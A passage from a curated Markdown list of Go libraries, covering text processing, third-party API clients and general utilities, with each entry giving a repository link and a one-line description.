easy.\n - [selenoid](https://github.com/aerokube/selenoid) - alternative Selenium hub server that launches browsers within containers.\n\n- Fail injection\n - [failpoint](https://github.com/pingcap/failpoint) - An implementation of [failpoints](https://www.freebsd.org/cgi/man.cgi?query=fail) for Golang.\n\n**[⬆ back to top](#contents)**\n\n## Text Processing\n\n_Libraries for parsing and manipulating texts._\n\nSee also [Natural Language Processing](#natural-language-processing) and [Text Analysis](#text-analysis).\n\n### Formatters\n\n- [address](https://github.com/bojanz/address) - Handles address representation, validation and formatting.\n- [align](https://github.com/Guitarbum722/align) - A general purpose application that aligns text.\n- [bytes](https://github.com/labstack/gommon/tree/master/bytes) - Formats and parses numeric byte values (10K, 2M, 3G, etc.).\n- [go-fixedwidth](https://github.com/ianlopshire/go-fixedwidth) - Fixed-width text formatting (encoder/decoder with reflection).\n- [go-humanize](https://github.com/dustin/go-humanize) - Formatters for time, numbers, and memory size to human readable format.\n- [gotabulate](https://github.com/bndr/gotabulate) - Easily pretty-print your tabular data with Go.\n- [textwrap](https://github.com/isbm/textwrap) - Wraps text at end of lines. Implementation of `textwrap` module from Python.\n\n### Markup Languages\n\n- [bafi](https://github.com/mmalcek/bafi) - Universal JSON, BSON, YAML, XML translator to ANY format using templates.\n- [bbConvert](https://github.com/CalebQ42/bbConvert) - Converts bbCode to HTML that allows you to add support for custom bbCode tags.\n- [blackfriday](https://github.com/russross/blackfriday) - Markdown processor in Go.\n- [github_flavored_markdown](https://godoc.org/github.com/shurcooL/github_flavored_markdown) - GitHub Flavored Markdown renderer (using blackfriday) with fenced code block highlighting, clickable header anchor links.\n- [go-output-format](https://github.com/drewstinnett/go-output-format) - Output go structures into multiple formats (YAML/JSON/etc) in your command line app.\n- [go-toml](https://github.com/pelletier/go-toml) - Go library for the TOML format with query support and handy cli tools.\n- [goldmark](https://github.com/yuin/goldmark) - A Markdown parser written in Go. Easy to extend, standard (CommonMark) compliant, well structured.\n- [goq](https://github.com/andrewstuart/goq) - Declarative unmarshaling of HTML using struct tags with jQuery syntax (uses GoQuery).\n- [html-to-markdown](https://github.com/JohannesKaufmann/html-to-markdown) - Convert HTML to Markdown. Even works with entire websites and can be extended through rules.\n- [htmlquery](https://github.com/antchfx/htmlquery) - An XPath query package for HTML, lets you extract data or evaluate from HTML documents by an XPath expression.\n- [htmlyaml](https://github.com/nikolaydubina/htmlyaml) - Rich rendering of YAML as HTML in Go\n- [mxj](https://github.com/clbanning/mxj) - Encode / decode XML as JSON or map[string]interface{}; extract values with dot-notation paths and wildcards. Replaces x2j and j2x packages.\n- [toml](https://github.com/BurntSushi/toml) - TOML configuration format (encoder/decoder with reflection).\n\n### Parsers/Encoders/Decoders\n\n- [allot](https://github.com/sbstjn/allot) - Placeholder and wildcard text parsing for CLI tools and bots.\n- [codetree](https://github.com/aerogo/codetree) - Parses indented code (python, pixy, scarlet, etc.) and returns a tree structure.\n- [commonregex](https://github.com/mingrammer/commonregex) - A collection of common regular expressions for Go.\n- [did](https://github.com/ockam-network/did) - DID (Decentralized Identifiers) Parser and Stringer in Go.\n- [doi](https://github.com/hscells/doi) - Document object identifier (doi) parser in Go.\n- [editorconfig-core-go](https://github.com/editorconfig/editorconfig-core-go) - Editorconfig file parser and manipulator for Go.\n- [encdec](https://github.com/mickep76/encdec) - Package provides a generic interface to encoders and decoders.\n- [go-fasttld](https://github.com/elliotwutingfeng/go-fasttld) - High performance effective top level domains (eTLD) extraction module.\n- [go-nmea](https://github.com/adrianmo/go-nmea) - NMEA parser library for the Go language.\n- [go-vcard](https://github.com/emersion/go-vcard) - Parse and format vCard.\n- [gofeed](https://github.com/mmcdole/gofeed) - Parse RSS and Atom feeds in Go.\n- [gographviz](https://github.com/awalterschulze/gographviz) - Parses the Graphviz DOT language.\n- [gonameparts](https://github.com/polera/gonameparts) - Parses human names into individual name parts.\n- [ltsv](https://github.com/Wing924/ltsv) - High performance [LTSV (Labeled Tab Separated Value)](http://ltsv.org/) reader for Go.\n- [normalize](https://github.com/avito-tech/normalize) - Sanitize, normalize and compare fuzzy text.\n- [omniparser](https://github.com/jf-tech/omniparser) - A versatile ETL library that parses text input (CSV/txt/JSON/XML/EDI/X12/EDIFACT/etc) in streaming fashion and transforms data into JSON output using data-driven schema.\n- [parseargs-go](https://github.com/nproc/parseargs-go) - string argument parser that understands quotes and backslashes.\n- [parth](https://github.com/codemodus/parth) - URL path segmentation parsing.\n- [sdp](https://github.com/gortc/sdp) - SDP: Session Description Protocol [[RFC 4566](https://tools.ietf.org/html/rfc4566)].\n- [sh](https://github.com/mvdan/sh) - Shell parser and formatter.\n- [tokenizer](https://github.com/bzick/tokenizer) - Parse any string, slice or infinite buffer to any tokens.\n- [when](https://github.com/olebedev/when) - Natural EN and RU language date/time parser with pluggable rules.\n- [xj2go](https://github.com/stackerzzq/xj2go) - Convert xml or json to go struct.\n\n### Regular Expressions\n\n- [genex](https://github.com/alixaxel/genex) - Count and expand Regular Expressions into all matching Strings.\n- [go-wildcard](https://github.com/IGLOU-EU/go-wildcard) - Simple and lightweight wildcard pattern matching.\n- [goregen](https://github.com/zach-klippenstein/goregen) - Library for generating random strings from regular expressions.\n- [regroup](https://github.com/oriser/regroup) - Match regex expression named groups into go struct using struct tags and automatic parsing.\n- [rex](https://github.com/hedhyw/rex) - Regular expressions builder.\n\n### Sanitation\n\n- [bluemonday](https://github.com/microcosm-cc/bluemonday) - HTML Sanitizer.\n- [gofuckyourself](https://github.com/JoshuaDoes/gofuckyourself) - A sanitization-based swear filter for Go.\n\n### Scrapers\n\n- [colly](https://github.com/asciimoo/colly) - Fast and Elegant Scraping Framework for Gophers.\n- [dataflowkit](https://github.com/slotix/dataflowkit) - Web scraping Framework to turn websites into structured data.\n- [go-recipe](https://github.com/kkyr/go-recipe) - A package for scraping recipes from websites.\n- [GoQuery](https://github.com/PuerkitoBio/goquery) - GoQuery brings a syntax and a set of features similar to jQuery to the Go language.\n- [gospider](https://github.com/zhshch2002/gospider) - A simple golang spider/scraping framework,build a spider in 3 lines. migrated from [goribot](https://github.com/zhshch2002/goribot)\n- [pagser](https://github.com/foolin/pagser) - Pagser is a simple, extensible, configurable parse and deserialize html page to struct based on goquery and struct tags for golang crawler.\n- [Tagify](https://github.com/zoomio/tagify) - Produces a set of tags from given source.\n- [walker](https://github.com/cyucelen/walker) - Seamlessly fetch paginated data from any source. Simple and high performance API scraping included.\n- [xurls](https://github.com/mvdan/xurls) - Extract urls from text.\n\n### RSS\n\n- [podcast](https://github.com/eduncan911/podcast) - iTunes Compliant and RSS 2.0 Podcast Generator in Golang\n- [syndfeed](https://github.com/zhengchun/syndfeed) - A syndication feed for Atom 1.0 and RSS 2.0.\n\n### Utility/Miscellaneous\n\n- [go-runewidth](https://github.com/mattn/go-runewidth) - Functions to get fixed width of the character or string.\n- [go-zero-width](https://github.com/trubitsyn/go-zero-width) - Zero-width character detection and removal for Go.\n- [kace](https://github.com/codemodus/kace) - Common case conversions covering common initialisms.\n- [petrovich](https://github.com/striker2000/petrovich) - Petrovich is the library which inflects Russian names to given grammatical case.\n- [radix](https://github.com/yourbasic/radix) - Fast string sorting algorithm.\n- [TySug](https://github.com/Dynom/TySug) - Alternative suggestions with respect to keyboard layouts.\n\n**[⬆ back to top](#contents)**\n\n## Third-party APIs\n\n_Libraries for accessing third party APIs._\n\n- [airtable](https://github.com/mehanizm/airtable) - Go client library for the [Airtable API](https://airtable.com/api).\n- [amazon-product-advertising-api](https://github.com/ngs/go-amazon-product-advertising-api) - Go Client Library for [Amazon Product Advertising API](https://affiliate-program.amazon.com/gp/advertising/api/detail/main.html).\n- [anaconda](https://github.com/ChimeraCoder/anaconda) - Go client library for the Twitter 1.1 API.\n- [appstore-sdk-go](https://github.com/Kachit/appstore-sdk-go) - Unofficial Golang SDK for AppStore Connect API.\n- [aws-sdk-go](https://github.com/aws/aws-sdk-go) - The official AWS SDK for the Go programming language.\n- [bqwriter](https://github.com/OTA-Insight/bqwriter) - High Level Go Library to write data into [Google BigQuery](https://cloud.google.com/bigquery) at a high throughout.\n- [brewerydb](https://github.com/naegelejd/brewerydb) - Go library for accessing the BreweryDB API.\n- [cachet](https://github.com/andygrunwald/cachet) - Go client library for [Cachet (open source status page system)](https://cachethq.io/).\n- [circleci](https://github.com/jszwedko/go-circleci) - Go client library for interacting with CircleCI's API.\n- [clarifai](https://github.com/samuelcouch/clarifai) - Go client library for interfacing with the Clarifai API.\n- [codeship-go](https://github.com/codeship/codeship-go) - Go client library for interacting with Codeship's API v2.\n- [coinpaprika-go](https://github.com/coinpaprika/coinpaprika-api-go-client) - Go client library for interacting with Coinpaprika's API.\n- [device-check-go](https://github.com/rinchsan/device-check-go) - Go client library for interacting with [iOS DeviceCheck API](https://developer.apple.com/documentation/devicecheck) v1.\n- [discordgo](https://github.com/bwmarrin/discordgo) - Go bindings for the Discord Chat API.\n- [dusupay-sdk-go](https://github.com/Kachit/dusupay-sdk-go) - Unofficial Dusupay payment gateway API Client for Go\n- [ethrpc](https://github.com/onrik/ethrpc) - Go bindings for Ethereum JSON RPC API.\n- [facebook](https://github.com/huandu/facebook) - Go Library that supports the Facebook Graph API.\n- [fasapay-sdk-go](https://github.com/Kachit/fasapay-sdk-go) - Unofficial Fasapay payment gateway XML API Client for Golang.\n- [fcm](https://github.com/maddevsio/fcm) - Go library for Firebase Cloud Messaging.\n- [gads](https://github.com/emiddleton/gads) - Google Adwords Unofficial API.\n- [gami](https://github.com/bit4bit/gami) - Go library for Asterisk Manager Interface.\n- [gcm](https://github.com/Aorioli/gcm) - Go library for Google Cloud Messaging.\n- [geo-golang](https://github.com/codingsince1985/geo-golang) - Go Library to access [Google Maps](https://developers.google.com/maps/documentation/geocoding/intro), [MapQuest](https://developer.mapquest.com/documentation/geocoding-api/), [Nominatim](https://developer.mapquest.com/documentation/open/nominatim-search), [OpenCage](https://opencagedata.com/api), [Bing](https://msdn.microsoft.com/en-us/library/ff701715.aspx), [Mapbox](https://www.mapbox.com/developers/api/geocoding/), and [OpenStreetMap](https://wiki.openstreetmap.org/wiki/Nominatim) geocoding / reverse geocoding APIs.\n- [github](https://github.com/google/go-github) - Go library for accessing the GitHub REST API v3.\n- [githubql](https://github.com/shurcooL/githubql) - Go library for accessing the GitHub GraphQL API v4.\n- [go-atlassian](https://github.com/ctreminiom/go-atlassian) - Go library for accessing the [Atlassian Cloud](https://www.atlassian.com/enterprise/cloud) services (Jira, Jira Service Management, Jira Agile, Confluence, Admin Cloud)\n- [go-aws-news](https://github.com/circa10a/go-aws-news) - Go application and library to fetch what's new from AWS.\n- [go-chronos](https://github.com/axelspringer/go-chronos) - Go library for interacting with the [Chronos](https://mesos.github.io/chronos/) Job Scheduler\n- [go-hacknews](https://github.com/PaulRosset/go-hacknews) - Tiny Go client for HackerNews API.\n- [go-here](https://github.com/abdullahselek/go-here) - Go client library around the HERE location based APIs.\n- [go-hibp](https://github.com/wneessen/go-hibp) - Simple Go binding to the \"Have I Been Pwned\" APIs.\n- [go-imgur](https://github.com/koffeinsource/go-imgur) - Go client library for [imgur](https://imgur.com)\n- [go-jira](https://github.com/andygrunwald/go-jira) - Go client library for [Atlassian JIRA](https://www.atlassian.com/software/jira)\n- [go-lark](https://github.com/go-lark/lark) - An easy-to-use unofficial SDK for [Feishu](https://open.feishu.cn/) and [Lark](https://open.larksuite.com/) Open Platform.\n- [go-marathon](https://github.com/gambol99/go-marathon) - Go library for interacting with Mesosphere's Marathon PAAS.\n- [go-myanimelist](https://github.com/nstratos/go-myanimelist) - Go client library for accessing the [MyAnimeList API](https://myanimelist.net/apiconfig/references/api/v2).\n- [go-openai](https://github.com/sashabaranov/go-openai) - OpenAI ChatGPT, DALL·E, Whisper API library for Go.\n- [go-openproject](https://github.com/manuelbcd/go-openproject) - Go client library for interacting with [OpenProject](https://docs.openproject.org/api/) API.\n- [go-postman-collection](https://github.com/rbretecher/go-postman-collection) - Go module to work with [Postman Collections](https://learning.getpostman.com/docs/postman/collections/creating-collections/) (compatible with Insomnia).\n- [go-restcountries](https://github.com/chriscross0/go-restcountries) - Go library for the [REST Countries API](https://countrylayer.com/).\n- [go-sophos](https://github.com/esurdam/go-sophos) - Go client library for the [Sophos UTM REST API](https://www.sophos.com/en-us/medialibrary/PDFs/documentation/UTMonAWS/Sophos-UTM-RESTful-API.pdf?la=en) with zero dependencies.\n- [go-sptrans](https://github.com/sergioaugrod/go-sptrans) - Go client library for the SPTrans Olho Vivo API.\n- [go-swagger-ui](https://github.com/esurdam/go-swagger-ui) - Go library containing precompiled [Swagger UI](https://swagger.io/tools/swagger-ui/) for serving swagger json.\n- [go-telegraph](https://gitlab.com/toby3d/telegraph) - Telegraph publishing platform API client.\n- [go-trending](https://github.com/andygrunwald/go-trending) - Go library for accessing [trending repositories](https://github.com/trending) and [developers](https://github.com/trending/developers) at Github.\n- [go-twitter](https://github.com/dghubble/go-twitter) - Go client library for the Twitter v1.1 APIs.\n- [go-unsplash](https://github.com/hbagdi/go-unsplash) - Go client library for the [Unsplash.com](https://unsplash.com) API.\n- [go-xkcd](https://github.com/nishanths/go-xkcd) - Go client for the xkcd API.\n- [go-yapla](https://git.iglou.eu/Production/go-yapla) - Go client library for the Yapla v2.0 API.\n- [goagi](https://github.com/staskobzar/goagi) - Go library to build Asterisk PBX agi/fastagi applications.\n- [goami2](https://github.com/staskobzar/goami2) - AMI v2 library for Asterisk PBX.\n- [GoFreeDB](https://github.com/FreeLeh/GoFreeDB) - Golang library providing common and simple database abstractions on top of Google Sheets.\n- [gogtrends](https://github.com/groovili/gogtrends) - Google Trends Unofficial API.\n- [golang-tmdb](https://github.com/cyruzin/golang-tmdb) - Golang wrapper for The Movie Database API v3.\n- [golyrics](https://github.com/mamal72/golyrics) - Golyrics is a Go library to fetch music lyrics data from the Wikia website.\n- [gomalshare](https://github.com/MonaxGT/gomalshare) - Go library MalShare API [malshare.com](https://www.malshare.com/)\n- [GoMusicBrainz](https://github.com/michiwend/gomusicbrainz) - Go MusicBrainz WS2 client library.\n- [google](https://github.com/google/google-api-go-client) - Auto-generated Google APIs for Go.\n- [google-analytics](https://github.com/chonthu/go-google-analytics) - Simple wrapper for easy google analytics reporting.\n- [google-cloud](https://github.com/GoogleCloudPlatform/gcloud-golang) - Google Cloud APIs Go Client Library.\n- [google-email-audit-api](https://github.com/ngs/go-google-email-audit-api) - Go client library for [Google G Suite Email Audit API](https://developers.google.com/admin-sdk/email-audit/).\n- [google-play-scraper](https://github.com/n0madic/google-play-scraper) - Get data from Google Play Store.\n- [gopaapi5](https://github.com/utekaravinash/gopaapi5) - Go Client Library for [Amazon Product Advertising API 5.0](https://webservices.amazon.com/paapi5/documentation/).\n- [gosip](https://github.com/koltyakov/gosip) - Client library for SharePoint.\n- [gostorm](https://github.com/jsgilmore/gostorm) - GoStorm is a Go library that implements the communications protocol required to write Storm spouts and Bolts in Go that communicate with the Storm shells.\n- [hipchat](https://github.com/andybons/hipchat) - This project implements a golang client library for the Hipchat API.\n- [hipchat (xmpp)](https://github.com/daneharrigan/hipchat) - A golang package to communicate with HipChat over XMPP.\n- [igdb](https://github.com/Henry-Sarabia/igdb) - Go client for the [Internet Game Database API](https://api.igdb.com/).\n- [jokeapi-go](https://github.com/icelain/jokeapi) - Go client for [JokeAPI](https://sv443.net/jokeapi/v2/).\n- [lark](https://github.com/chyroc/lark) - [Feishu](https://open.feishu.cn/)/[Lark](https://open.larksuite.com/) Open API Go SDK, Support ALL Open API and Event Callback.\n- [lastpass-go](https://github.com/ansd/lastpass-go) - Go client library for the [LastPass](https://www.lastpass.com/) API.\n- [libgoffi](https://github.com/clevabit/libgoffi) - Library adapter toolbox for native [libffi](https://sourceware.org/libffi/) integration\n- [Medium](https://github.com/Medium/medium-sdk-go) - Golang SDK for Medium's OAuth2 API.\n- [megos](https://github.com/andygrunwald/megos) - Client library for accessing an [Apache Mesos](https://mesos.apache.org/) cluster.\n- [minio-go](https://github.com/minio/minio-go) - Minio Go Library for Amazon S3 compatible cloud storage.\n- [mixpanel](https://github.com/dukex/mixpanel) - Mixpanel is a library for tracking events and sending Mixpanel profile updates to Mixpanel from your go applications.\n- [newsapi-go](https://github.com/jellydator/newsapi-go) - Go client for [NewsAPI](https://newsapi.org/).\n- [openaigo](https://github.com/otiai10/openaigo) - OpenAI GPT3/GPT3.5 ChatGPT API client library for Go.\n- [patreon-go](https://github.com/mxpv/patreon-go) - Go library for Patreon API.\n- [paypal](https://github.com/logpacker/PayPal-Go-SDK) - Wrapper for PayPal payment API.\n- [playlyfe](https://github.com/playlyfe/playlyfe-go-sdk) - The Playlyfe Rest API Go SDK.\n- [pushover](https://github.com/gregdel/pushover) - Go wrapper for the Pushover API.\n- [rawg-sdk-go](https://github.com/dimuska139/rawg-sdk-go) - Go library for the [RAWG Video Games Database](https://rawg.io/) API\n- [rrdaclient](https://github.com/Omie/rrdaclient) - Go Library to access statdns.com API, which is in turn RRDA API. DNS Queries over HTTP.\n- [shopify](https://github.com/rapito/go-shopify) - Go Library to make CRUD request to the Shopify API.\n- [simples3](https://github.com/rhnvrm/simples3) - Simple no frills AWS S3 Library using REST with V4 Signing written in Go.\n- [slack](https://github.com/slack-go/slack) - Slack API in Go.\n- [smite](https://github.com/sergiotapia/smitego) - Go package to wraps access to the Smite game API.\n- [spotify](https://github.com/rapito/go-spotify) - Go Library to access Spotify WEB API.\n- [steam](https://github.com/sostronk/go-steam) - Go Library to interact with Steam game servers.\n- [stripe](https://github.com/stripe/stripe-go) - Go client for the Stripe API.\n- [swag](https://github.com/zc2638/swag) - No comments, simple go wrapper to create swagger 2.0 compatible APIs. Support most routing frameworks, such as built-in, gin, chi, mux, echo, httprouter, fasthttp and more.\n- [textbelt](https://github.com/dietsche/textbelt) - Go client for the textbelt.com txt messaging API.\n- [translate](https://github.com/poorny/translate) - Go online translation package.\n- [Trello](https://github.com/adlio/trello) - Go wrapper for the Trello API.\n- [TripAdvisor](https://github.com/mrbenosborne/tripadvisor-golang) - Go wrapper for the TripAdvisor API.\n- [tumblr](https://github.com/mattcunningham/gumblr) - Go wrapper for the Tumblr v2 API.\n- [twitter-scraper](https://github.com/n0madic/twitter-scraper) - Scrape the Twitter Frontend API without authentication and limits.\n- [uptimerobot](https://github.com/bitfield/uptimerobot) - Go wrapper and command-line client for the Uptime Robot v2 API.\n- [vl-go](https://github.com/verifid/vl-go) - Go client library around the VerifID identity verification layer API.\n- [webhooks](https://github.com/go-playground/webhooks) - Webhook receiver for GitHub and Bitbucket.\n- [wit-go](https://github.com/wit-ai/wit-go) - Go client for wit.ai HTTP API.\n- [ynab](https://github.com/brunomvsouza/ynab.go) - Go wrapper for the YNAB API.\n- [zooz](https://github.com/gojuno/go-zooz) - Go client for the Zooz API.\n\n**[⬆ back to top](#contents)**\n\n## Utilities\n\n_General utilities and tools to make your life easier._\n\n- [apm](https://github.com/topfreegames/apm) - Process manager for Golang applications with an HTTP API.\n- [backscanner](https://github.com/icza/backscanner) - A scanner similar to bufio.Scanner, but it reads and returns lines in reverse order, starting at a given position and going backward.\n- [beyond](https://github.com/wesovilabs/beyond) - The Go tool that will drive you to the AOP world!\n- [blank](https://github.com/Henry-Sarabia/blank) - Verify or remove blanks and whitespace from strings.\n- [bleep](https://github.com/sinhashubham95/bleep) - Perform any number of actions on any set of OS signals in Go.\n- [boilr](https://github.com/tmrts/boilr) - Blazingly fast CLI tool for creating projects from boilerplate templates.\n- [changie](https://github.com/miniscruff/changie) - Automated changelog tool for preparing releases with lots of customization options.\n- [chyle](https://github.com/antham/chyle) - Changelog generator using a git repository with multiple configuration possibilities.\n- [circuit](https://github.com/cep21/circuit) - An efficient and feature complete Hystrix like Go implementation of the circuit breaker pattern.\n- [circuitbreaker](https://github.com/rubyist/circuitbreaker) - Circuit Breakers in Go.\n- [clipboard](https://github.com/golang-design/clipboard) - 📋 cross-platform clipboard package in Go.\n- [clockwork](https://github.com/jonboulle/clockwork) - A simple fake clock for golang.\n- [cmd](https://github.com/SimonBaeumer/cmd) - Library for executing shell commands on osx, windows and linux.\n- [command](https://github.com/txgruppi/command) - Command pattern for Go with thread safe serial and parallel dispatcher.\n- [contextplus](https://github.com/contextplus/contextplus) - Package contextplus provide more easy to use functions for contexts.\n- [copy](https://github.com/gotidy/copy) - Package for fast copying structs of different types.\n- [copy-pasta](https://github.com/jutkko/copy-pasta) - Universal multi-workstation clipboard that uses S3 like backend for the storage.\n- [countries](https://github.com/biter777/countries) - Full implementation of ISO-3166-1, ISO-4217, ITU-T E.164, Unicode CLDR and IANA ccTLD standards.\n- [countries](https://github.com/pioz/countries) - All you need when you are working with countries in Go.\n- [create-go-app](https://github.com/create-go-app/cli) - A powerful CLI for create a new production-ready project with backend (Golang), frontend (JavaScript, TypeScript) & deploy automation (Ansible, Docker) by running one command.\n- [cryptgo](https://github.com/Gituser143/cryptgo) - Crytpgo is a TUI based application written purely in Go to monitor and observe cryptocurrency prices in real time!\n- [ctop](https://github.com/bcicen/ctop) - [Top-like](https://ctop.sh) interface (e.g. htop) for container metrics.\n- [ctxutil](https://github.com/posener/ctxutil) - A collection of utility functions for contexts.\n- [cvt](https://github.com/shockerli/cvt) - Easy and safe convert any value to another type.\n- [dbt](https://github.com/nikogura/dbt) - A framework for running self-updating signed binaries from a central, trusted repository.\n- [Death](https://github.com/vrecan/death) - Managing go application shutdown with signals.\n- [Deepcopier](https://github.com/ulule/deepcopier) - Simple struct copying for Go.\n- [delve](https://github.com/derekparker/delve) - Go debugger.\n- [dive](https://github.com/wagoodman/dive) - A tool for exploring each layer in a Docker image.\n- [dlog](https://github.com/kirillDanshin/dlog) - Compile-time controlled logger to make your release smaller without removing debug calls.\n- [EaseProbe](https://github.com/megaease/easeprobe) - A simple, standalone, and lightWeight tool that can do health/status checking daemon, support HTTP/TCP/SSH/Shell/Client/... probes, and Slack/Discord/Telegram/SMS... notification.\n- [equalizer](https://github.com/reugn/equalizer) - Quota manager and rate limiter collection for Go.\n- [ergo](https://github.com/cristianoliveira/ergo) - The management of multiple local services running over different ports made easy.\n- [evaluator](https://github.com/nullne/evaluator) - Evaluate an expression dynamically based on s-expression. It's simple and easy to extend.\n- [filetype](https://github.com/h2non/filetype) - Small package to infer the file type checking the magic numbers signature.\n- [filler](https://github.com/yaronsumel/filler) - small utility to fill structs using \"fill\" tag.\n- [filter](https://github.com/gookit/filter) - provide filtering, sanitizing, and conversion of Go data.\n- [fzf](https://github.com/junegunn/fzf) - Command-line fuzzy finder written in Go.\n- [generate](https://github.com/go-playground/generate) - runs go generate recursively on a specified path or environment variable and can filter by regex.\n- [ghokin](https://github.com/antham/ghokin) - Parallelized formatter with no external dependencies for gherkin (cucumber, behat...).\n- [git-time-metric](https://github.com/git-time-metric/gtm) - Simple, seamless, lightweight time tracking for Git.\n- [gitbatch](https://github.com/isacikgoz/gitbatch) - manage your git repositories in one place.\n- [go-actuator](https://github.com/sinhashubham95/go-actuator) - Production ready features for Go based web frameworks.\n- [go-astitodo](https://github.com/asticode/go-astitodo) - Parse TODOs in your GO code.\n- [go-bind-plugin](https://github.com/wendigo/go-bind-plugin) - go:generate tool for wrapping symbols exported by golang plugins (1.8 only).\n- [go-bsdiff](https://github.com/gabstv/go-bsdiff) - Pure Go bsdiff and bspatch libraries and CLI tools.\n- [go-clip](https://github.com/prashantgupta24/go-clip) - A minimalistic clipboard manager for Mac.\n- [go-convert](https://github.com/Eun/go-convert) - Package go-convert enables you to convert a value into another type.\n- [go-countries](https://github.com/mikekonan/go-countries) - Lightweight lookup over ISO-3166 codes.\n- [go-dry](https://github.com/ungerik/go-dry) - DRY (don't repeat yourself) package for Go.\n- [go-funk](https://github.com/thoas/go-funk) - Modern Go utility library which provides helpers (map, find, contains, filter, chunk, reverse, ...).\n- [go-health](https://github.com/Talento90/go-health) - Health package simplifies the way you add health check to your services.\n- [go-httpheader](https://github.com/mozillazg/go-httpheader) - Go library for encoding structs into Header fields.\n- [go-lock](https://github.com/viney-shih/go-lock) - go-lock is a lock library implementing read-write mutex and read-write trylock without starvation.\n- [go-pkg](https://github.com/chenquan/go-pkg) - A go toolkit.\n- [go-problemdetails](https://github.com/mvmaasakkers/go-problemdetails) - Go package for working with Problem Details.\n- [go-rate](https://github.com/beefsack/go-rate) - Timed rate limiter for Go.\n- [go-sitemap-generator](https://github.com/ikeikeikeike/go-sitemap-generator) - XML Sitemap generator written in Go.\n- [go-trigger](https://github.com/sadlil/go-trigger) - Go-lang global event triggerer, Register Events with an id and trigger the event from anywhere from your project.\n- [go-type](https://github.com/mikekonan/go-types) - Library providing Go types for store/validation and transfer of ISO-4217, ISO-3166, and other types.\n- [goback](https://github.com/carlescere/goback) - Go simple exponential backoff package.\n- [goctx](https://github.com/zerosnake0/goctx) - Get your context value with high performance.\n- [godaemon](https://github.com/VividCortex/godaemon) - Utility to write daemons.\n- [godropbox](https://github.com/dropbox/godropbox) - Common libraries for writing Go services/applications from Dropbox.\n- [gofn](https://github.com/tiendc/gofn) - High performance utitlity functions written using Generics for Go 1.18+.\n- [gohper](https://github.com/cosiner/gohper) - Various tools/modules help for development.\n- [golarm](https://github.com/msempere/golarm) - Fire alarms with system events.\n- [golog](https://github.com/mlimaloureiro/golog) - Easy and lightweight CLI tool to time track your tasks.\n- [gopencils](https://github.com/bndr/gopencils) - Small and simple package to easily consume REST APIs.\n- [goplaceholder](https://github.com/michiwend/goplaceholder) - a small golang lib to generate placeholder images.\n- [goreadability](https://github.com/philipjkim/goreadability) - Webpage summary extractor using Facebook Open Graph and arc90's readability.\n- [goreleaser](https://github.com/goreleaser/goreleaser) - Deliver Go binaries as fast and easily as possible.\n- [goreporter](https://github.com/wgliang/goreporter) - Golang tool that does static analysis, unit testing, code review and generate code quality report.\n- [goseaweedfs](https://github.com/linxGnu/goseaweedfs) - SeaweedFS client library with almost full features.\n- [gostrutils](https://github.com/ik5/gostrutils) - Collections of string manipulation and conversion functions.\n- [gotenv](https://github.com/subosito/gotenv) - Load environment variables from `.env` or any `io.Reader` in Go.\n- [goval](https://github.com/maja42/goval) - Evaluate arbitrary expressions in Go.\n- [gpath](https://github.com/tenntenn/gpath) - Library to simplify access struct fields with Go's expression in reflection.\n- [graterm](https://github.com/skovtunenko/graterm) - Provides primitives to perform ordered (sequential/concurrent) GRAceful TERMination (aka shutdown) in Go application.\n- [grofer](https://github.com/pesos/grofer) - A system and resource monitoring tool written in Golang!\n- [gubrak](https://github.com/novalagung/gubrak) - Golang utility library with syntactic sugar. It's like lodash, but for golang.\n- [handy](https://github.com/miguelpragier/handy) - Many utilities and helpers like string handlers/formatters and validators.\n- [hostctl](https://github.com/guumaster/hostctl) - A CLI tool to manage /etc/hosts with easy commands.\n- [htcat](https://github.com/htcat/htcat) - Parallel and Pipelined HTTP GET Utility.\n- [hub](https://github.com/github/hub) - wrap git commands with additional functionality to interact with github from the terminal.\n- [hystrix-go](https://github.com/afex/hystrix-go) - Implements Hystrix patterns of programmer-defined fallbacks aka circuit breaker.\n- [immortal](https://github.com/immortal/immortal) - \\*nix cross-platform (OS agnostic) supervisor.\n- [intrinsic](https://github.com/mengzhuo/intrinsic) - Use x86 SIMD without writing any assembly code.\n- [jsend](https://github.com/clevergo/jsend) - JSend's implementation written in Go.\n- [jump](https://github.com/gsamokovarov/jump) - Jump helps you navigate faster by learning your habits.\n- [just](https://github.com/kazhuravlev/just) - Just a collection of useful functions for working with generic data structures.\n- [koazee](https://github.com/wesovilabs/koazee) - Library inspired in Lazy evaluation and functional programming that takes the hassle out of working with arrays.\n- [lancet](https://github.com/duke-git/lancet) - A comprehensive, efficient, and reusable util function library of go.\n- [lets-go](https://github.com/aplescia-chwy/lets-go) - Go module that provides common utilities for Cloud Native REST API development. Also contains AWS Specific utilities.\n- [limiters](https://github.com/mennanov/limiters) - Rate limiters for distributed applications in Golang with configurable back-ends and distributed locks.\n- [lo](https://github.com/samber/lo) - A Lodash like Go library based on Go 1.18+ Generics (map, filter, contains, find...)\n- [loncha](https://github.com/kazu/loncha) - A high-performance slice Utilities.\n- [lrserver](https://github.com/jaschaephraim/lrserver) - LiveReload server for Go.\n- [mani](https://github.com/alajmo/mani) - CLI tool to help you manage multiple repositories.\n- [mc](https://github.com/minio/mc) - Minio Client provides minimal tools to work with Amazon S3 compatible cloud storage and filesystems.\n- [mergo](https://github.com/imdario/mergo) - Helper to merge structs and maps in Golang. Useful for configuration default values, avoiding messy if-statements.\n- [mimemagic](https://github.com/zRedShift/mimemagic) - Pure Go ultra performant MIME sniffing library/utility.\n- [mimesniffer](https://github.com/aofei/mimesniffer) - A MIME type sniffer for Go.\n- [mimetype](https://github.com/gabriel-vasile/mimetype) - Package for MIME type detection based on magic numbers.\n- [minify](https://github.com/tdewolff/minify) - Fast minifiers for HTML, CSS, JS, XML, JSON and SVG file formats.\n- [minquery](https://github.com/icza/minquery) - MongoDB / mgo.v2 query that supports efficient pagination (cursors to continue listing documents where we left off).\n- [moldova](https://github.com/StabbyCutyou/moldova) - Utility for generating random data based on an input template.\n- [mole](https://github.com/davrodpin/mole) - cli app to easily create ssh tunnels.\n- [mongo-go-pagination](https://github.com/gobeam/mongo-go-pagination) - Mongodb Pagination for official mongodb/mongo-go-driver package which supports both normal queries and Aggregation pipelines.\n- [mssqlx](https://github.com/linxGnu/mssqlx) - Database client library, proxy for any master slave, master master structures. Lightweight and auto balancing in mind.\n- [multitick](https://github.com/VividCortex/multitick) - Multiplexor for aligned tickers.\n- [myhttp](https://github.com/inancgumus/myhttp) - Simple API to make HTTP GET requests with timeout support.\n- [netbug](https://github.com/e-dard/netbug) - Easy remote profiling of your services.\n- [nfdump](https://github.com/chrispassas/nfdump) - Read nfdump netflow files.\n- 